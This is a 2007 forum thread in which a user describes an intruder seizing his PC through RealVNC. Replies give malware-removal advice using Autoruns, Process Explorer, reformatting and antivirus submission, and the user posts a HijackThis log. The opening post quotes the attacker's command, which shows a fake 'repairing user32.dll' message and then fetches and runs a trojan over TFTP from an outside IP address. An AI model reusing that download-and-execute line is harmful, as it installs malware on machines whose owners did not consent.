Advertisement
If you have a new account but are having problems posting or verifying your account, please email us on hello@boards.ie for help. Thanks :)
Hello all! Please ensure that you are posting a new thread or question in the appropriate forum. The Feedback forum is overwhelmed with questions that are having to be moved elsewhere. If you need help to verify your account contact hello@boards.ie

Hacked while on my computer!

  • 12-06-2007 01:22PM
    #1
    Registered Users, Registered Users 2 Posts: 5,517 ✭✭✭


    Hi Everyone,

    I was just working away on my computer when all of a sudden I saw the realVNC logo on the bottom right hand corner go black and the mouse started jumping around the place.

    It went to the start menu and clicked on run then it typed this into the run box and ran it:
    %comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 75.5.227.42 GET bykwzwyo.exe & start bykwzwyo&

    I quickly moved the mouse to the realvnc icon and stopped it.

    I have stopped the bykwzwyo.exe process as I could see it running in Windows Task Manager.

    The IP address 75.5.227.42 belongs to this adsl-75-5-227-42.dsl.klmzmi.sbcglobal.net hostname which seems to be a customer of sbcglobal, a division of AT&T.

    The IP address is owned by Southwestern Bell Internet.

    What do I do now? It says in the network lookup to report abuse to abuse@sbcglobal.net so I have sent an email to them.

    I have had to halt the internet also as it is coming up on my Trend Pc-Cillin that it is inspecting outgoing messages. Whatever was installed must have been still running.

    I ran hijack this and removed entries. I also found the file that was installed and there was a prefetch file with it that when I opened it looked like it had collected some information from my computer. How much information, I do not know.

    The reason I was hacked was because I had just setup my computer on the DMZ and had turned off my firewall for testing purposes - bad combination.

    What else should I do to make sure nothing is still running?
    Should I submit the exe file and the prefetch file to some organisation or an antivirus company?

    Thanks for any help/advice.

    Noel.


Comments

  • Closed Accounts Posts: 1,567 ✭✭✭Martyr


    here is what i initially do when checking a system for malware.

    start autoruns, if you haven't got it, download it HERE from the sysinternals website.

    if its the first time you run on the system, it will scan and display all entries, so hit ESC key to stop it, we need to change the options.

    the next part will make finding malware alot easier.
    Go to options and enable both 'Verify Code Signatures' and 'Hide Signed Microsoft Entries' as you can see in this picture.
    verify.jpg

    Now refresh (hit F5) to begin scanning again.

    Each tab shows you majority of locations on the system, software can startup.
    These include plugins in internet explorer, system services, drivers..think of a place, and its probably covered.

    Most "good" software will be signed (verified) and trusted by the operating system.
    It doesn't mean a signed file is not malicious, but the chances of it being so are alot less likely than if its (not verified)

    Also, just because its (not verified) doesn't mean its malicious either.(don't get confused, because finding malicious signed files rarely happens)

    Remove the suspicious entries, make the best use of Process Explorer also, its great for looking a process in detail.

    For example, you can check a process for TCP/IP ports, threads, loaded DLL modules, any dependencies, what files it has opened.

    If you're unsure, search online using the drop down box or CTRL+M

    search.jpg

    If a situation occurs that you have all microsoft entries displayed, then its possible that the catalog files have either been removed/corrupted maliciously or some software is preventing autoruns from verifying the executable image through hooking API.

    Autoruns and Process Explorer are very powerful, useful tools in tracking down basic types of malicious software.

    there are more extensive tests to be carried out from here should this not work. ;]


  • Banned (with Prison Access) Posts: 3,073 ✭✭✭mickoneill30


    If it was me and I didn't know what bykwzwyo.exe did I'd do a format and reinstall. You don't know if some service or exe has been replaced. Something could be running on your machine with an innocent name. You can scan with anti virus, spyware scanners but would you trust your machine.
    At the least you should update your realVNC. Some versions are vulnerable to a remote authentication bypass vulnerability (http://www.securityfocus.com/bid/17978/discuss)


  • Closed Accounts Posts: 884 ✭✭✭NutJob


    -Format and re-install.
    -Patch
    -Secure
    -Then move the PC to the DMZ

    Normally a pc in a dmz is attacked by some worm at least every 3-4 min by some exploit or another (deliberate under estimate).

    If you install from an old unpatched cd in a dmz you will be infected before you can patch

    edit:spelling


  • Closed Accounts Posts: 1,567 ✭✭✭Martyr


    If it was me and I didn't know what bykwzwyo.exe did I'd do a format and reinstall. You don't know if some service or exe has been replaced. Something could be running on your machine with an innocent name.

    I understand your concerns here, but let me explain the useful feature of autoruns, where it verifies an executable image.

    When i said 'Hide Signed Microsoft Entries', autoruns will still verify that any Microsoft executeable is trusted, and if not, display it..

    Process Explorer can also verify DLL modules inside a process, as seen here.

    pe_explorer.jpg

    if you want a command line tool, check out sigcheck

    you can recursively search through many directories, or verify just one file like below.

    cmd_prompt.jpg

    Reasons why i'd recommend using AR+PE before any virus scan or re-install.

    1. virus scanners only identify malware from signatures in its database, which are constantly updated to reflect NEW threats.
    If the software was in the wild (NEW unidentified threat) , then chances are a virus scan won't pick it up as being malicious.
    Also, some scanners take too long, time is critical ;]

    2. re-installing might not be necessary.If its simply a matter of removing the startup entry, and deleting the files, sometimes that is enough, if done carefully.

    If you're running a large server, re-installing is a time consuming process, meaning money.


  • Closed Accounts Posts: 1,567 ✭✭✭Martyr


    NutJob wrote:
    -Format and re-install.
    -Patch
    -Secure
    -Then move the PC to the DMZ

    Normally a pc ina dmz is attacked by some worm at least every 3-4 min by some exploit or another.

    If you install from an old unpatched cd in a dmz you will be infected before you can patch

    I'm not against re-installing an operating system after its been infected with a virus.
    Normally, i would make an assessment before taking such actions.

    If the infection is severe, then the appropriate action is to re-install, but 9 times out of 10, its usually just a silly piece of software that can be easily removed, hardly worth a re-install.


  • Advertisement
  • Registered Users, Registered Users 2 Posts: 2,372 ✭✭✭Illkillya


    I saw this exact same thing before. An older verison of RealVNC (till around October last year I think) had a huge vulnerability whereby somebody can bypass the VNC password and access your machine.


  • Banned (with Prison Access) Posts: 3,073 ✭✭✭mickoneill30


    If the infection is severe, then the appropriate action is to re-install, but 9 times out of 10, its usually just a silly piece of software that can be easily removed, hardly worth a re-install.

    I agree with you there. In this case though we don't know what was run on his machine. Normally if a machines infected with a virus I'll check the vendors website and see what it did. In this case we don't know what it did. There could be some obscure .exe or .dll file sitting there that won't be run for the next 6 months.
    The OP can investigate and be reasonably sure that his machine is clean but can he be 100% sure?
    Autoruns is a good step but I don't like putting on stuff after the problem occured.


  • Closed Accounts Posts: 1,567 ✭✭✭Martyr


    I agree with you there. In this case though we don't know what was run on his machine. Normally if a machines infected with a virus I'll check the vendors website and see what it did. In this case we don't know what it did. There could be some obscure .exe or .dll file sitting there that won't be run for the next 6 months.

    absolutely, but any "dropped" files from the executeable can be found later using a virus scanner, AFTER we've submitted the unidentified module 'bykwzwyo.exe' to the AV vendor for a closer inspection.

    You have to consider how important a system is, of course.
    What are the chances of your system being infected by a highly advanced rootkit?, NOT already identified?? ..highly unlikely, unless you've got something someone very powerful wants.

    If your system has a rootkit, then yes, re-install.if its just another ****ty bot, try send a copy to the av company of the scanner that didn't recognise it, remove it, search online and see who else has encountered it.

    i've used this kaspersky service in the past also for checking some images i wasn't sure of


  • Registered Users, Registered Users 2 Posts: 5,517 ✭✭✭axer


    Thanks everyone for your help.
    i've used this kaspersky service in the past also for checking some images i wasn't sure of
    I checked the file using the link you provided and it returned:
    Scanned file: bykwzwyo.exe - Infected
    bykwzwyo.exe - infected by Trojan-Downloader.Win32.Tiny.ho

    I cannot find any information about the virus though.


  • Closed Accounts Posts: 1,970 ✭✭✭ActorSeeksJob


    actually if that is a running process it could be something bad. any chance you could post a HijackThis log here?


  • Advertisement
  • Registered Users, Registered Users 2 Posts: 43 hantakage


    Some nice advise there from Average Joe. As Joe mentioned, if you have neutralised the malwares load points (run, winlogon, services etc) using autoruns - at least the threat should not be running. Obviously this does not cover all cases (file infectors, rootkits, etc), but its a good start.

    If you have access to a virtual machine (VmWare/VirtualPC) or just a plain old pc that is off the network and you don't care about hosing, I would advise taking the exe and running it on the system to see what files it creates / traffic it generates.

    Some great tools for this are Regmon and Filemon from Sysinternals, Regshot, and of course Wireshark for Network Captures.

    This way you can find out everything the threat does when it runs, and then remove these files off your actual PC


  • Registered Users, Registered Users 2 Posts: 5,517 ✭✭✭axer


    actually if that is a running process it could be something bad. any chance you could post a HijackThis log here?
    It was a running process until I stopped it and located the file.
    Logfile of HijackThis v1.99.1
    Scan saved at 18:18:31, on 12/06/2007
    Platform: Windows XP SP2 (WinNT 5.01.2600)
    MSIE: Internet Explorer v7.00 (7.00.6000.16441)

    Running processes:
    C:\WINDOWS\System32\smss.exe
    C:\WINDOWS\system32\winlogon.exe
    C:\WINDOWS\system32\services.exe
    C:\WINDOWS\system32\lsass.exe
    C:\WINDOWS\system32\svchost.exe
    C:\WINDOWS\System32\svchost.exe
    C:\Program Files\Intel\Wireless\Bin\S24EvMon.exe
    C:\WINDOWS\system32\spoolsv.exe
    C:\WINDOWS\Explorer.EXE
    C:\Program Files\Common Files\Acronis\Schedule2\schedul2.exe
    C:\Program Files\WIDCOMM\Bluetooth Software\bin\btwdins.exe
    C:\Program Files\Intel\Wireless\Bin\EvtEng.exe
    C:\Program Files\Common Files\LightScribe\LSSrvc.exe
    C:\Program Files\LogMeIn\x86\RaMaint.exe
    C:\WINDOWS\system32\igfxtray.exe
    C:\WINDOWS\system32\hkcmd.exe
    C:\Program Files\Java\jre1.5.0_09\bin\jusched.exe
    C:\Program Files\Synaptics\SynTP\SynTPLpr.exe
    C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
    C:\Program Files\HPQ\Quick Launch Buttons\EabServr.exe
    C:\Program Files\LogMeIn\x86\LogMeIn.exe
    C:\Program Files\HPQ\HP Wireless Assistant\HP Wireless Assistant.exe
    C:\Program Files\Adobe\Adobe Acrobat 7.0\Distillr\Acrotray.exe
    C:\WINDOWS\system32\rundll32.exe
    C:\Program Files\Hp\HP Software Update\HPWuSchd2.exe
    C:\Program Files\Labtec\Mouse\2.1\moffice.exe
    C:\Program Files\Trend Micro\Internet Security 2007\pccguide.exe
    C:\Program Files\Acronis\TrueImageWorkstation\TrueImageMonitor.exe
    C:\Program Files\Common Files\Acronis\Schedule2\schedhlp.exe
    C:\Program Files\Acronis\TrueImageWorkstation\TimounterMonitor.exe
    C:\Program Files\Labtec\Mouse\2.1\MOUSE32A.EXE
    C:\Program Files\Winamp\winampa.exe
    C:\Program Files\Intel\Wireless\bin\ZCfgSvc.exe
    C:\Program Files\Intel\Wireless\Bin\ifrmewrk.exe
    C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\fppdis3a.exe
    C:\Program Files\LogMeIn\x86\LogMeInSystray.exe
    C:\Program Files\QuickTime\qttask.exe
    C:\Program Files\MSN Messenger\MsnMsgr.Exe
    C:\WINDOWS\system32\ctfmon.exe
    C:\Program Files\Trend Micro\Internet Security 2007\TMAS_OE\TMAS_OEMon.exe
    C:\Program Files\InterVideo\Common\Bin\WinCinemaMgr.exe
    C:\Program Files\TechSmith\SnagIt 8\SnagIt32.exe
    C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
    C:\PROGRA~1\TRENDM~1\INTERN~1\PcCtlCom.exe
    C:\Program Files\Intel\Wireless\Bin\RegSrvc.exe
    C:\Program Files\TechSmith\SnagIt 8\TSCHelp.exe
    C:\Program Files\Alcohol Soft\Alcohol 120\StarWind\StarWindService.exe
    C:\WINDOWS\system32\svchost.exe
    C:\PROGRA~1\TRENDM~1\INTERN~1\Tmntsrv.exe
    C:\PROGRA~1\TRENDM~1\INTERN~1\TmPfw.exe
    C:\PROGRA~1\TRENDM~1\INTERN~1\tmproxy.exe
    C:\PROGRA~1\TRENDM~1\INTERN~1\PcScnSrv.exe
    C:\Program Files\HPQ\SHARED\HPQWMI.exe
    C:\Program Files\Intel\Wireless\Bin\Dot1XCfg.exe
    C:\WINDOWS\system32\wuauclt.exe
    C:\WINDOWS\System32\svchost.exe
    C:\Program Files\Mozilla Firefox\firefox.exe
    C:\Program Files\Internet Explorer\iexplore.exe
    C:\downloads\firefox\hijackthis(2)\HijackThis.exe

    R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.ie/
    R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
    R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
    R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
    R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
    O2 - BHO: HelperObject Class - {00C6482D-C502-44C8-8409-FCE54AD9C208} - C:\Program Files\TechSmith\SnagIt 8\SnagItBHO.dll
    O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Adobe Acrobat 7.0\ActiveX\AcroIEHelper.dll
    O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll
    O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.5.0_09\bin\ssv.dll
    O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar3.dll
    O2 - BHO: AcroIEToolbarHelper Class - {AE7CD045-E861-484f-8273-0445EE161910} - C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll
    O2 - BHO: IE DOM Explorer - {CC7E636D-39AA-49b6-B511-65413DA137A1} - C:\Program Files\Internet Explorer Developer Toolbar\IEDevToolbar.dll
    O3 - Toolbar: Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll
    O3 - Toolbar: SnagIt - {8FF5E183-ABDE-46EB-B09E-D2AAB95CABE3} - C:\Program Files\TechSmith\SnagIt 8\SnagItIEAddin.dll
    O3 - Toolbar: Developer Toolbar - {CC962137-2E78-4f94-975E-FC0C07DBD78F} - C:\Program Files\Internet Explorer Developer Toolbar\IEDevToolbar.dll
    O3 - Toolbar: Zend Studio - {95188727-288F-4581-A48D-EAB3BD027314} - C:\PROGRA~1\Zend\ZENDST~1.0\bin\ZENDIE~1.DLL
    O4 - HKLM\..\Run: [IgfxTray] C:\WINDOWS\system32\igfxtray.exe
    O4 - HKLM\..\Run: [HotKeysCmds] C:\WINDOWS\system32\hkcmd.exe
    O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre1.5.0_09\bin\jusched.exe"
    O4 - HKLM\..\Run: [SynTPLpr] C:\Program Files\Synaptics\SynTP\SynTPLpr.exe
    O4 - HKLM\..\Run: [SynTPEnh] C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
    O4 - HKLM\..\Run: [eabconfg.cpl] C:\Program Files\HPQ\Quick Launch Buttons\EabServr.exe /Start
    O4 - HKLM\..\Run: [Cpqset] C:\Program Files\HPQ\Default Settings\cpqset.exe
    O4 - HKLM\..\Run: [LSBWatcher] c:\hp\drivers\hplsbwatcher\lsburnwatcher.exe
    O4 - HKLM\..\Run: [hpWirelessAssistant] "%ProgramFiles%\HPQ\HP Wireless Assistant\HP Wireless Assistant.exe"
    O4 - HKLM\..\Run: [Acrobat Assistant 7.0] "C:\Program Files\Adobe\Adobe Acrobat 7.0\Distillr\Acrotray.exe"
    O4 - HKLM\..\Run: [BluetoothAuthenticationAgent] rundll32.exe bthprops.cpl,,BluetoothAuthenticationAgent
    O4 - HKLM\..\Run: [NeroFilterCheck] C:\Program Files\Common Files\Ahead\Lib\NeroCheck.exe
    O4 - HKLM\..\Run: [HP Software Update] C:\Program Files\Hp\HP Software Update\HPWuSchd2.exe
    O4 - HKLM\..\Run: [FLMOFFICE4DMOUSE] C:\Program Files\Labtec\Mouse\2.1\moffice.exe
    O4 - HKLM\..\Run: [hplampc] C:\WINDOWS\system32\hplampc.exe
    O4 - HKLM\..\Run: [pccguide.exe] "C:\Program Files\Trend Micro\Internet Security 2007\pccguide.exe"
    O4 - HKLM\..\Run: [TrueImageMonitor.exe] C:\Program Files\Acronis\TrueImageWorkstation\TrueImageMonitor.exe
    O4 - HKLM\..\Run: [AcronisTimounterMonitor] C:\Program Files\Acronis\TrueImageWorkstation\TimounterMonitor.exe
    O4 - HKLM\..\Run: [Acronis Scheduler2 Service] "C:\Program Files\Common Files\Acronis\Schedule2\schedhlp.exe"
    O4 - HKLM\..\Run: [WinampAgent] C:\Program Files\Winamp\winampa.exe
    O4 - HKLM\..\Run: [IntelZeroConfig] "C:\Program Files\Intel\Wireless\bin\ZCfgSvc.exe"
    O4 - HKLM\..\Run: [IntelWireless] "C:\Program Files\Intel\Wireless\Bin\ifrmewrk.exe" /tf Intel PROSet/Wireless
    O4 - HKLM\..\Run: [pdfFactory Pro Dispatcher v3] "C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\fppdis3a.exe" /source=HKLM
    O4 - HKLM\..\Run: [LogMeIn GUI] "C:\Program Files\LogMeIn\x86\LogMeInSystray.exe"
    O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
    O4 - HKLM\..\Run: [KernelFaultCheck] %systemroot%\system32\dumprep 0 -k
    O4 - HKCU\..\Run: [MsnMsgr] "C:\Program Files\MSN Messenger\MsnMsgr.Exe" /background
    O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
    O4 - HKCU\..\Run: [swg] C:\Program Files\Google\GoogleToolbarNotifier\1.0.720.3640\GoogleToolbarNotifier.exe
    O4 - HKCU\..\Run: [OE] "C:\Program Files\Trend Micro\Internet Security 2007\TMAS_OE\TMAS_OEMon.exe"
    O4 - Startup: Adobe Gamma.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
    O4 - Startup: InterVideo WinCinema Manager.lnk = C:\Program Files\InterVideo\Common\Bin\WinCinemaMgr.exe
    O4 - Startup: SnagIt 8.lnk = C:\Program Files\TechSmith\SnagIt 8\SnagIt32.exe
    O4 - Global Startup: Adobe Gamma.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
    O4 - Global Startup: InterVideo WinCinema Manager.lnk = C:\Program Files\InterVideo\Common\Bin\WinCinemaMgr.exe
    O4 - Global Startup: SnagIt 8.lnk = C:\Program Files\TechSmith\SnagIt 8\SnagIt32.exe
    O8 - Extra context menu item: Convert link target to Adobe PDF - res://C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
    O8 - Extra context menu item: Convert link target to existing PDF - res://C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
    O8 - Extra context menu item: Convert selected links to Adobe PDF - res://C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECaptureSelLinks.html
    O8 - Extra context menu item: Convert selected links to existing PDF - res://C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppendSelLinks.html
    O8 - Extra context menu item: Convert selection to Adobe PDF - res://C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
    O8 - Extra context menu item: Convert selection to existing PDF - res://C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
    O8 - Extra context menu item: Convert to Adobe PDF - res://C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
    O8 - Extra context menu item: Convert to existing PDF - res://C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
    O8 - Extra context menu item: E&xport to Microsoft Office Excel - res://C:\PROGRA~1\MICROS~3\OFFICE11\EXCEL.EXE/3000
    O8 - Extra context menu item: Send To &Bluetooth - C:\Program Files\WIDCOMM\Bluetooth Software\btsendto_ie_ctx.htm
    O8 - Extra context menu item: Sothink SWF Catcher - C:\Program Files\Common Files\SourceTec\SWF Catcher\InternetExplorer.htm
    O8 - Extra context menu item: Zend Studio - Debug current page - res://C:\Program Files\Zend\ZendStudio-5.5.0\bin\ZendIEToolbar.dll/DebugCurrent.html
    O8 - Extra context menu item: Zend Studio - Debug next page - res://C:\Program Files\Zend\ZendStudio-5.5.0\bin\ZendIEToolbar.dll/DebugNext.html
    O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_09\bin\ssv.dll
    O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_09\bin\ssv.dll
    O9 - Extra button: Run WinHTTrack - {36ECAF82-3300-8F84-092E-AFF36D6C7040} - C:\Program Files\WinHTTrack\WinHTTrackIEBar.dll
    O9 - Extra 'Tools' menuitem: Launch WinHTTrack - {36ECAF82-3300-8F84-092E-AFF36D6C7040} - C:\Program Files\WinHTTrack\WinHTTrackIEBar.dll
    O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~3\OFFICE11\REFIEBAR.DLL
    O9 - Extra button: Zend Studio Toolbar - {A26ABCF0-1C8F-46e7-A67C-0489DC21B9CC} - C:\PROGRA~1\Zend\ZENDST~1.0\bin\ZENDIE~1.DLL
    O9 - Extra 'Tools' menuitem: Zend Studio - {A26ABCF0-1C8F-46e7-A67C-0489DC21B9CC} - C:\PROGRA~1\Zend\ZENDST~1.0\bin\ZENDIE~1.DLL
    O9 - Extra button: Sothink SWF Catcher - {E19ADC6E-3909-43E4-9A89-B7B676377EE3} - C:\Program Files\Common Files\SourceTec\SWF Catcher\InternetExplorer.htm
    O9 - Extra 'Tools' menuitem: Sothink SWF Catcher - {E19ADC6E-3909-43E4-9A89-B7B676377EE3} - C:\Program Files\Common Files\SourceTec\SWF Catcher\InternetExplorer.htm
    O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
    O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
    O11 - Options group: [INTERNATIONAL] International*
    O16 - DPF: {00B71CFB-6864-4346-A978-C0A14556272C} (Checkers Class) - http://messenger.zone.msn.com/binary/msgrchkr.cab31267.cab
    O16 - DPF: {0EB0E74A-2A76-4AB3-A7FB-9BD8C29F7F75} (CKAVWebScan Object) - http://www.kaspersky.com/kos/eng/partner/default/kavwebscan_unicode.cab
    O16 - DPF: {14C1B87C-3342-445F-9B5E-365FF330A3AC} (Hewlett-Packard Online Support Services) - http://h20278.www2.hp.com/HPISWeb/Customer/cabs/HPISDataManager.CAB
    O16 - DPF: {17492023-C23A-453E-A040-C7C580BBF700} (Windows Genuine Advantage Validation Tool) - http://go.microsoft.com/fwlink/?linkid=39204
    O16 - DPF: {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} (MUWebControl Class) - http://update.microsoft.com/microsoftupdate/v6/V5Controls/en/x86/client/muweb_site.cab?1144075296375
    O16 - DPF: {8E0D4DE5-3180-4024-A327-4DFAD1796A8D} (MessengerStatsClient Class) - http://messenger.zone.msn.com/binary/MessengerStatsClient.cab31267.cab
    O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
    O20 - Winlogon Notify: igfxcui - C:\WINDOWS\SYSTEM32\igfxsrvc.dll
    O20 - Winlogon Notify: LMIinit - C:\WINDOWS\SYSTEM32\LMIinit.dll
    O23 - Service: Acronis Scheduler2 Service (AcrSch2Svc) - Acronis - C:\Program Files\Common Files\Acronis\Schedule2\schedul2.exe
    O23 - Service: Adobe LM Service - Adobe Systems - C:\Program Files\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe
    O23 - Service: Bluetooth Service (btwdins) - Broadcom Corporation. - C:\Program Files\WIDCOMM\Bluetooth Software\bin\btwdins.exe
    O23 - Service: Intel(R) PROSet/Wireless Event Log (EvtEng) - Intel Corporation - C:\Program Files\Intel\Wireless\Bin\EvtEng.exe
    O23 - Service: HP WMI Interface (hpqwmi) - Hewlett-Packard Development Company, L.P. - C:\Program Files\HPQ\SHARED\HPQWMI.exe
    O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
    O23 - Service: LightScribeService Direct Disc Labeling Service (LightScribeService) - Unknown owner - C:\Program Files\Common Files\LightScribe\LSSrvc.exe
    O23 - Service: LogMeIn Maintenance Service (LMIMaint) - LogMeIn, Inc. - C:\Program Files\LogMeIn\x86\RaMaint.exe
    O23 - Service: LogMeIn - LogMeIn, Inc. - C:\Program Files\LogMeIn\x86\LogMeIn.exe
    O23 - Service: Trend Micro Central Control Component (PcCtlCom) - Trend Micro Inc. - C:\PROGRA~1\TRENDM~1\INTERN~1\PcCtlCom.exe
    O23 - Service: Trend Micro Protection Against Spyware (PcScnSrv) - Trend Micro Inc. - C:\PROGRA~1\TRENDM~1\INTERN~1\PcScnSrv.exe
    O23 - Service: Intel(R) PROSet/Wireless Registry Service (RegSrvc) - Intel Corporation - C:\Program Files\Intel\Wireless\Bin\RegSrvc.exe
    O23 - Service: Remote Packet Capture Protocol v.0 (experimental) (rpcapd) - Unknown owner - %ProgramFiles%\WinPcap\rpcapd.exe" -d -f "%ProgramFiles%\WinPcap\rpcapd.ini (file missing)
    O23 - Service: Intel(R) PROSet/Wireless Service (S24EventMonitor) - Intel Corporation - C:\Program Files\Intel\Wireless\Bin\S24EvMon.exe
    O23 - Service: StarWind iSCSI Service (StarWindService) - Rocket Division Software - C:\Program Files\Alcohol Soft\Alcohol 120\StarWind\StarWindService.exe
    O23 - Service: Trend Micro Real-time Service (Tmntsrv) - Trend Micro Inc. - C:\PROGRA~1\TRENDM~1\INTERN~1\Tmntsrv.exe
    O23 - Service: Trend Micro Personal Firewall (TmPfw) - Trend Micro Inc. - C:\PROGRA~1\TRENDM~1\INTERN~1\TmPfw.exe
    O23 - Service: Trend Micro Proxy Service (tmproxy) - Trend Micro Inc. - C:\PROGRA~1\TRENDM~1\INTERN~1\tmproxy.exe

    I am now running Kaspersky's online scanner and I have submitted the file to Trend Micro as their product did not detect it.

    I am sending my laptop to the USA for repairs anyway in the next 2 weeks so I will be reformating it anyway.


  • Closed Accounts Posts: 1,567 ✭✭✭Martyr


    hantakage wrote:
    Obviously this does not cover all cases (file infectors, rootkits, etc), but its a good start.

    hi rob, nice to know i'm appreciated. hehe

    i'm curious to know how many file infectors are released on average every year, or how many symantec receive.

    I always believed since the introduction of SFP and cryptographic signing of operating system components..and because its easily detected by AV scanner, not to mention that most malware is written in some HLL not completely suitable for file infectors, that generally, this kind of malicious action was avoided.

    I'm aware SFP can be disabled through RPC service, but even if a microsoft image was infected, autoruns would display it as (not verified)

    also, have you ever encountered any polymorphic/metamorphic rootkits yet?

    thanks!


  • Registered Users, Registered Users 2 Posts: 43 hantakage


    I don't have the figures to hand, but file infectors are definitely still out there.

    Just looking at the list of most recent threats on the Symantec Website

    W32.Xema.A is a File Infecting Worm
    W32.Rosserag is also a File Infector
    W32.Dizan.D is a doc file infector

    and there are a whole pile more as well in that list, so still very current, and very much in the wild.

    As far as Rootkits go Backdoor.Rustock.B is still one of the nastiest, and I think that it has some polymorphic code. It uses a kernal mode rootkit, to hide a device service, which in turns runs from an Alternative Data Stream on the System32 folder. The writeup has even more details of all the nasty stuff it does.


Advertisement